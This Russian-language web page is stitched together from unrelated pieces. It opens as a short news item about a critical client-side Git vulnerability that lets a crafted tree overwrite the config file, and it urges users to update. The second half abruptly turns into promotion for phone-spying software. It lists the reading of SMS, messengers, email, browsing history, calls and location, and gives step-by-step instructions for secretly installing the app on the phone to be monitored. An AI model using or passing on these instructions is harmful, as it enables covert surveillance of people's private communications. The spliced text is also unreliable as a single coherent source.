Обнаружена критическая уязвимость в Git

026Всем разработчикам, которые используют систему управления файлами Git, настоятельно рекомендуется в срочном порядке установить обновление, которое устраняет эту критическую брешь. Уязвимость работает на стороне клиента, поэтому злоумышленник может получать удалённый доступ к целевой системе, а затем выполнять на ней любой произвольный код. Разработчики Git в своём блоге на github.com подтверждают, что практически все клиенты для Mac и Windows, как и сопутствующее ПО, подвержены таким атакам.

Если производится нападение, древо файлов Git может перезаписывать конфигурационный файл config с новыми настройками, что и позволит удалённо выполнять заданный код. Перезапись происходит в том случае, если владелец компьютера жертвы попробует скопировать файл в новое место, или же просто проверить его целостность. Злоумышленник сможет получить полный доступ к целевой системе, запуская там любые приложения.

Уязвимость затрагивает ПО на OS X и Windows, если на них используются файловые системы HFS+ / NTFS и FAT соответственно. Таковых остаётся подавляющее большинство. А вот версия под Linux, при условии использования системы с зависимостью от регистра, находится в относительной безопасности. Тем не менее, обновление было выпущено и для неё.

Поскольку происходит быстрое обнаружение и блокирование, разработчики подчёркивают безопасность использования Git. Требуется лишь установить необходимый апдейт, а также регулярно отслеживать блог создателей Git, в котором публикуются самые актуальные новости о проекте.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.